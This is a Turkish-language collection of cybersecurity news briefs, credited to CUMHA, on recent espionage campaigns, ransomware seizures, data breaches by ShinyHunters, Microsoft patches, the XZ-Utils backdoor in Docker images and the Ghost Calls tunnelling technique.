Bitdefender araştırmacıları, Curly COMrades adını verdikleri yeni bir siber casusluk grubunun Gürcistan’daki devlet ve yargı kurumlarını, Moldova’daki enerji şirketlerini hedef aldığını açıkladı. Grup, bilinen APT’lerle doğrudan örtüşmese de operasyonlarının Rusya’nın jeopolitik hedefleriyle paralellik gösterdiği ifade edildi.

MucorAgent arka kapısı
Grubun saldırılarında kullandığı MucorAgent zararlısı üç aşamalı yapıya sahip. İlk aşamada COM nesneleri ele geçirilerek ikinci aşama yükleniyor; bu bileşen Windows’un Antimalware Scan Interface (AMSI) korumasını atlatıyor. Üçüncü aşama ise belirli dizinlerde bulunan şifrelenmiş PNG dosyalarındaki verileri (muhtemelen komut dosyaları) çalıştırıyor.

Kalıcı erişim için yaratıcı yöntemler
Araştırmacılar, saldırganların NGEN (Native Image Generator) bileşenini hedef alarak devre dışı görünen ancak belirli durumlarda çalışan zamanlanmış görevleri kötüye kullandığını tespit etti. Ayrıca, Resocks proxy aracı, SOCKS5 sunucuları, SSH + Stunnel tünelleme ve CurlCat gibi özel geliştirilmiş araçlar kullanıldı.

Hedef: Kimlik bilgileri ve ağ hareketi
Saldırganların etki alanı denetleyicilerinden NTDS veritabanını ve LSASS bellek dökümlerini çıkarmaya çalıştığı, ağda kalıcı erişim için geçerli kimlik bilgilerini toplamaya odaklandığı belirtildi. Ayrıca netstat, tasklist, systeminfo, wmic, ipconfig gibi komutlar ve Active Directory keşfi için PowerShell betikleri kullanıldı.

Gizlilik çabaları sonuçsuz kaldı
Curly COMrades’in “living-off-the-land” teknikleri, açık kaynak araçları ve yoğun COM manipülasyonlarıyla gizlilik sağlamaya çalıştığı, ancak modern EDR/XDR sistemlerinin bu faaliyetleri tespit edecek kadar gürültü oluştuğu kaydedildi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

En yüksek güvenlik standardı
pKVM, Android cihazlarda sanallaştırma çerçevesinin çekirdeğini oluşturan hipervizör. Google, sistemin DEKRA tarafından akredite laboratuvarlarda test edildiğini ve gelişmiş tehditlere karşı dirençli olduğunun doğrulandığını duyurdu.

SESIP Level 5 nedir
SESIP (Security Evaluation Standard for IoT Platforms), IoT ve mobil platformlar için geliştirilen bir güvenlik standardı. Level 5, Common Criteria’nin (ISO 15408) en yüksek güvenlik seviyesi olan AVA_VAN.5’e eşdeğer. Bu seviye, pKVM’nin sofistike saldırılara karşı dayanıklı olduğunu ortaya koyuyor.

pKVM’nin kullanım alanları
Hipervizör, Android cihazlarda kritik görevlerin güvenli şekilde çalıştırılmasını sağlıyor. Bunlar arasında:

• Google’ın Gemini Nano gibi yapay zekâ modellerinin cihaz üzerinde çalıştırılması,

• biyometrik kimlik doğrulama (yüz, parmak izi),

• DRM korumalı içeriklerin işlenmesi,

• cihazın firmware düzeyinde güvenlik fonksiyonları bulunuyor.

Kullanıcılar için anlamı
Google’a göre akıllı telefonlar artık yalnızca kişisel bilgileri değil, aynı zamanda yapay zekâ modelleriyle işlenen yüksek değerli verileri de barındırıyor. Bu da saldırganlar için cazip bir hedef oluşturuyor. SESIP Level 5 sertifikası, Android cihazlarda bu verilerin güvenliğinin daha üst düzeyde sağlanacağı anlamına geliyor.

Google’dan açıklama
Android Güvenlik ve Gizlilik Başkan Yardımcısı Dave Kleidermacher, “Cihaz üzerinde yapılan işlemeler arttıkça, kişisel veriler daha değerli hale geliyor. Bu nedenle güçlü güvenlik önlemleri zorunlu” diyerek sertifikanın önemini vurguladı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

1 milyon dolarlık kriptoya el konuldu
ABD Adalet Bakanlığı, BlackSuit fidye yazılımı grubuna ait dijital varlıkların 9 Ocak 2024’te ele geçirildiğini açıkladı. Söz konusu varlıkların değeri 1.091.453 dolar olarak açıklandı. Kripto paralar, suçlular tarafından farklı borsalar üzerinden defalarca transfer edilerek izleri gizlenmeye çalışılırken tespit edilip donduruldu.

Fidye ödemesinden kaynaklanıyor
Yetkililere göre el konulan varlıklar, 4 Nisan 2023’te fidye ödemesi yapan bir kurbanın gönderdiği 49,3 Bitcoin’den elde edildi. O dönemde bu ödemenin değeri yaklaşık 1,44 milyon dolardı.

Operation Checkmate ile bağlantılı
Bu duyuru, uluslararası “Operation Checkmate” operasyonu kapsamında BlackSuit’in gasp sitelerinin ele geçirilmesinin ardından geldi. Operasyon, BlackSuit ile bağlantılı Royal, Quantum ve Chaos fidye yazılım platformlarını da hedef aldı.

ABD’de 450 kuruluşa saldırdılar
Geçen hafta ABD İç Güvenlik Bakanlığı, Royal ve BlackSuit çetelerinin sağlık, eğitim, enerji, kamu güvenliği ve devlet kurumları dahil 450’den fazla ABD kuruluşunu hedef aldığını açıkladı. Bu saldırılardan toplam 370 milyon dolar değerinde fidye ödemesi elde edildi.

Daha önce 20 Bitcoin’e el konulmuştu
28 Temmuz’da FBI Dallas, Chaos fidye yazılımı grubuyla bağlantılı bir adreste 20 Bitcoin’e (yaklaşık 2,4 milyon dolar) el koyduğunu duyurmuştu.

Stratejik öneme sahip hamle
Adalet Bakanlığı, suçtan elde edilen gelirlerin ele geçirilmesinin, yakalanamayan operatörlerin finansal gücünü kırmak ve altyapılarını yeniden kurmalarını engellemek için kritik öneme sahip olduğunu vurguladı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Toplam 107 güvenlik açığı kapatıldı
Microsoft’un bu ay yayımladığı yama paketi 44 yetki yükseltme, 35 uzaktan kod yürütme, 18 bilgi ifşası, 4 hizmet reddi ve 9 sahtecilik açığını gideriyor. Bu açıkların 13’ü “kritik” olarak sınıflandırıldı.

Kerberos’ta sıfır gün açığı
En dikkat çekici güncelleme, CVE-2025-53779 kodlu Windows Kerberos açığı oldu. Bu açık, doğrulanmış bir saldırganın domain yöneticisi ayrıcalıkları elde etmesine imkân tanıyor. Açığın teknik detayları Mayıs 2025’te Akamai’den Yuval Gordon tarafından yayımlanmıştı.

Kritik uzaktan kod yürütme açıkları
Düzeltmeler arasında Microsoft Office (Word, Excel, PowerPoint, Visio), SharePoint, SQL Server, Windows GDI+ ve Message Queuing bileşenlerinde kritik seviyede RCE açıkları da bulunuyor. Bu açıklar, saldırganların kullanıcı etkileşimi olmadan sistem üzerinde zararlı kod çalıştırmasına yol açabiliyor.

Öne çıkan diğer yamalar

• Exchange Server: CVE-2025-53786, hibrit kurulumlarda bulut ortamına yetkisiz erişim sağlayabilecek yetki yükseltme açığı.

• Windows NTLM: Kritik yetki yükseltme zafiyeti.

• Hyper-V: Hem DoS hem de uzaktan kod yürütme açıkları.

• Microsoft Teams: Uzaktan kod çalıştırma açığı.

Diğer üretici yamalarıyla paralel
Ağustos güncellemeleri, son haftalarda diğer üreticilerden gelen yamaları da takip ediyor. 7-Zip, Adobe, Cisco, Fortinet, Google (Android), SAP ve Trend Micro da aktif olarak istismar edilen açıklar için güvenlik güncellemeleri yayımladı.

Uzmanlardan öneri
Siber güvenlik uzmanları, özellikle Kerberos açığı ve Office ürünlerindeki RCE açıklarının kurumlar için ciddi risk oluşturduğunu belirterek güncellemelerin gecikmeden uygulanması gerektiğini vurguluyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Tehlike Docker Hub’da sürüyor
Binarly araştırmacıları, Docker Hub’da barındırılan en az 35 Linux imajında XZ-Utils arka kapısının hâlâ bulunduğunu tespit etti. Bu imajların bazıları, üzerinde inşa edilen yeni imajları da dolaylı olarak enfekte ediyor.

XZ-Utils arka kapısı nedir
XZ-Utils sıkıştırma aracının 5.6.0 ve 5.6.1 sürümlerinde tespit edilen arka kapı, liblzma.so kütüphanesine gizlenmişti. Kod, OpenSSH’deki RSA_public_decrypt fonksiyonunu ele geçiriyor ve özel bir anahtara sahip saldırganın SSH üzerinden root yetkisiyle giriş yapmasına olanak tanıyordu.

Debian imajları kaldırmadı
Araştırmacıların uyarılarına rağmen Debian, 64 bitlik bazı imajları Docker Hub’dan çekmediğini doğruladı. Gerekçe olarak, istismarın düşük ihtimalle gerçekleşebileceği ve eski imajların “tarihsel arşiv” olarak korunması gerektiği belirtildi.

Risk halen devam ediyor
Binarly, bu yaklaşımın yanlış olduğunu ve bu imajların kamuya açık tutulmasının, otomatik yapılar veya yanlışlıkla indirmeler yoluyla ciddi risk oluşturduğunu vurguladı.

Kullanıcılara tavsiye
Uzmanlar, kullanılan imajların manuel olarak kontrol edilmesi ve XZ-Utils’in en az 5.6.2 sürümüne güncellenmiş olduğunun doğrulanması gerektiğini hatırlatıyor. En güncel sürüm 5.8.1 olarak yayımlanmış durumda.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Veri sızıntısı doğrulandı
Allianz Life, Temmuz 2025’te CRM sistemlerinden büyük çaplı bir veri hırsızlığı yaşadığını açıklamıştı. Hafta sonu itibarıyla ShinyHunters grubu, çalınan “Accounts” ve “Contacts” veritabanı tablolarını internette yayımladı. Bu tablolar, 2,8 milyon müşteri ve iş ortağı kaydını içeriyor.

Hangi veriler ifşa oldu
Sızdırılan dosyalarda kişisel bilgiler (isim, adres, telefon numarası, doğum tarihi, vergi kimlik numarası) ile mesleki bilgiler (lisanslar, kurum bağlantıları, ürün onayları ve pazarlama sınıflandırmaları) yer alıyor. BleepingComputer, verilerin doğruluğunu etkilenen kişilerle teyit etti.

Saldırının yöntemi
2025’in başında başlayan saldırı dalgasında tehdit aktörleri, çalışanları kandırarak şirketlerin Salesforce sistemlerine kötü amaçlı OAuth uygulamaları bağlatıyor. Bu bağlantılar üzerinden veritabanlarını indirip şirketlere fidye talebi gönderiyorlar.

Hacker gruplarının birleşimi
ShinyHunters, saldırının ardından yaptığı açıklamada Scattered Spider ile tek grup olduklarını duyurdu. Grup, daha önce Snowflake saldırısında da benzer yöntemlerle veri çalmıştı. Araştırmacılar, Lapsus$ grubunun eski üyelerinin de bu saldırılarda rol almış olabileceğini değerlendiriyor.

Allianz Life sessiz
Şirket, devam eden soruşturmayı gerekçe göstererek sızdırılan veriler hakkında yorum yapmadı. Ancak uzmanlar, ifşa edilen verilerin kimlik hırsızlığı ve dolandırıcılık risklerini artırdığı uyarısında bulunuyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Google da saldırıya uğradı
Google, dün gece yaptığı güncellemede Haziran ayında şirketin bir Salesforce CRM örneğinin ShinyHunters tarafından hedef alındığını doğruladı. Saldırıda küçük ve orta ölçekli işletmelere ait iletişim bilgileri ve notların indirildiği belirtildi.

Veriler sınırlı ama risk devam ediyor
Google’ın açıklamasına göre çalınan veriler esasen işletme adı ve iletişim bilgileri gibi büyük ölçüde kamuya açık bilgilerden oluşuyor. Ancak saldırı, müşteri güvenliği açısından dikkat çekici bulunuyor.

ShinyHunters kampanyası genişliyor
ShinyHunters, yıllardır Oracle Cloud, Snowflake, AT&T, Wattpad, MathWay gibi kurumlara yönelik saldırılarla biliniyor. Grup, son dönemde Adidas, Qantas, Allianz Life, Cisco, Louis Vuitton, Dior ve Tiffany & Co. gibi şirketlerin Salesforce sistemlerini de hedef aldı.

Vishing ve şantaj yöntemleri
Saldırılar, çalışanları hedef alan telefonla oltalama (vishing) teknikleriyle başlatılıyor. Grup, ele geçirdiği verileri kullanarak şirketlere e-posta yoluyla fidye talep ediyor. Şirketler ödeme yapmazsa verilerin sızdırılacağı tehdidinde bulunuyor. Bazı firmaların şimdiden ödeme yaptığı, bir şirketin verilerini sızdırmamak için yaklaşık 400 bin dolar değerinde Bitcoin gönderdiği öğrenildi.

Google’ın önlemleri
Google, saldırının ardından etki analizini tamamladığını ve gerekli güvenlik önlemlerini devreye aldığını açıkladı. Ancak ShinyHunters’ın saldırıları hâlen sürdüğü ve daha fazla büyük şirketin risk altında olduğu bildirildi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Görüşme trafiği kılıfında saldırı
Praetorian araştırmacısı Adam Crosser, “Ghost Calls” yöntemini BlackHat USA’da sundu. Bu teknik, Zoom ve Teams gibi konferans uygulamalarında kullanılan TURN protokolünü kullanarak saldırganların kurban sistem ile kendi altyapıları arasında WebRTC tüneli açmasına olanak sağlıyor.

Nasıl çalışıyor
Bir kullanıcı Zoom ya da Teams toplantısına katıldığında, geçici TURN kimlik bilgileri alıyor. Ghost Calls, bu kimlik bilgilerini kötüye kullanarak saldırgan ile hedef sistem arasında şifrelenmiş bir WebRTC tüneli kuruyor. Bu tünel, saldırı trafiğini normal konferans trafiği gibi gösterdiği için güvenlik duvarları, proxy’ler ve TLS denetimleri tarafından fark edilmiyor.

Yeni araç: TURNt
Crosser, “TURNt” adlı açık kaynak bir araç geliştirdi. Bu araç, saldırgan tarafında bir Controller (SOCKS proxy sunucusu) ve kurban sistemde çalışan bir Relay bileşeninden oluşuyor. TURN sunucuları üzerinden C2 trafiğini tünelleyebilen TURNt, SOCKS proxying, port yönlendirme, veri sızdırma ve gizli VNC bağlantılarına imkân sağlıyor.

Zoom’dan ilk önlem
Zoom, BleepingComputer’a yaptığı açıklamada, Ghost Calls’a karşı TURN altyapısının yalnızca medya sunucularla eşleşmeye izin verecek şekilde güncellendiğini ve peer-to-peer bağlantıların engellendiğini duyurdu. Microsoft’un ek önlem planlarına dair ise henüz bir bilgi bulunmuyor.

Tehditin önemi
Ghost Calls, herhangi bir sıfır gün zafiyetine ihtiyaç duymadan, tamamen mevcut protokollerin doğasından yararlanıyor. Uzmanlara göre bu tür yöntemler, saldırganlara hem performans hem de anonimlik sağlıyor ve geleneksel C2 yöntemlerine göre daha gizli ilerliyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Meşru sürücüyle güvenlik devre dışı bırakılıyor
Akira fidye yazılımı, ThrottleStop aracıyla kullanılan Intel sürücüsü “rwdrv.sys” üzerinden çekirdek seviyesinde erişim sağlıyor. Ardından “hlpdrv.sys” adlı kötü amaçlı sürücüyü yükleyerek Windows Defender’ın DisableAntiSpyware ayarını değiştiriyor ve korumaları devre dışı bırakıyor.

BYOVD tekniğiyle saldırı
Bu yöntem, “Bring Your Own Vulnerable Driver” (BYOVD) saldırı tekniğinin bir örneği. Yasal olarak imzalı ancak güvenlik açıkları bulunan sürücüler kullanılarak sistemde ayrıcalık yükseltiliyor. Akira’nın bu tekniği son haftalarda tekrarlayan saldırılarda sıkça görüldü.

SonicWall VPN saldırılarıyla bağlantı
Akira grubu kısa süre önce SonicWall SSLVPN servislerini de hedef aldı. Zero-day açık ihtimali gündeme gelse de, SonicWall henüz doğrulama yapmadı. Şirket, SSLVPN’in sınırlandırılması, MFA zorunluluğu, botnet/Geo-IP filtreleri ve kullanılmayan hesapların silinmesi gibi acil önlemler önerdi.

Sahte yazılım siteleriyle yayılıyor
The DFIR Report’a göre saldırılarda trojanlı MSI kurulum dosyaları kullanılıyor. “ManageEngine OpManager” gibi yazılımları arayan kullanıcılar, SEO zehirlemesi yoluyla opmanager[.]pro gibi sahte sitelere yönlendiriliyor. Bu sitelerden indirilen dosyalar, Bumblebee yükleyicisi aracılığıyla Akira’nın sisteme yerleşmesini sağlıyor.

Saldırıların ilerleyişi
Bumblebee, DLL yan yükleme yöntemiyle başlatılıyor, ardından AdaptixC2 ile kalıcı erişim sağlanıyor. Saldırganlar FileZilla üzerinden veri sızdırıyor, RustDesk ve SSH tünelleriyle kalıcılığı sürdürüyor. Ortalama 44 saat içinde “locker.exe” fidye yazılımı devreye giriyor ve etki alanlarındaki sistemler şifreleniyor.

Uzmanlardan uyarı
Güvenlik araştırmacıları, yalnızca resmi kaynaklardan yazılım indirilmesini, Akira ile ilgili IoC’lerin yakından takip edilmesini ve BYOVD tabanlı saldırılara karşı güvenlik çözümlerinin güncel tutulmasını öneriyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Saldırı müşteri hizmeti platformunda gerçekleşti
Air France ve KLM, 6 Ağustos 2025’te yaptıkları açıklamada, kullandıkları harici müşteri hizmeti platformunda olağandışı hareket tespit edildiğini ve bunun sonucunda müşteri verilerine yetkisiz erişim sağlandığını açıkladı.

Finansal veriler etkilenmedi
Şirketten yapılan duyuruda, saldırganların isim, e-posta adresi, telefon numarası, ödül programı bilgileri ve son işlem kayıtlarına ulaştığı, ancak müşterilerin finansal bilgilerinin ve kişisel güvenlik verilerinin etkilenmediği vurgulandı.

Yetkililer bilgilendirildi, müşteriler uyarıldı
KLM, olayı Hollanda Veri Koruma Kurumu’na, Air France ise Fransa’daki CNIL’e bildirdi. Etkilenen müşterilere uyarı mesajları gönderilerek şüpheli e-posta ve telefon aramalarına karşı dikkatli olmaları gerektiği belirtildi.

ShinyHunters grubuna bağlanıyor
BleepingComputer’un ulaştığı bilgilere göre olay, Salesforce platformlarını hedef alan ve Adidas, Qantas, Dior, Louis Vuitton, Chanel, Tiffany & Co. ile Google gibi markaları da etkileyen ShinyHunters grubunun sosyal mühendislik saldırılarıyla bağlantılı.

Havacılık sektörü saldırıların odağında
Air France–KLM olayı, son dönemde havacılık ve ulaşım sektörüne yönelen saldırıların bir parçası olarak değerlendiriliyor. Daha önce Scattered Spider grubu WestJet ve Hawaiian Airlines gibi firmaları hedef almıştı.

Kaynak: CUMHA - CUMHUR HABER AJANSI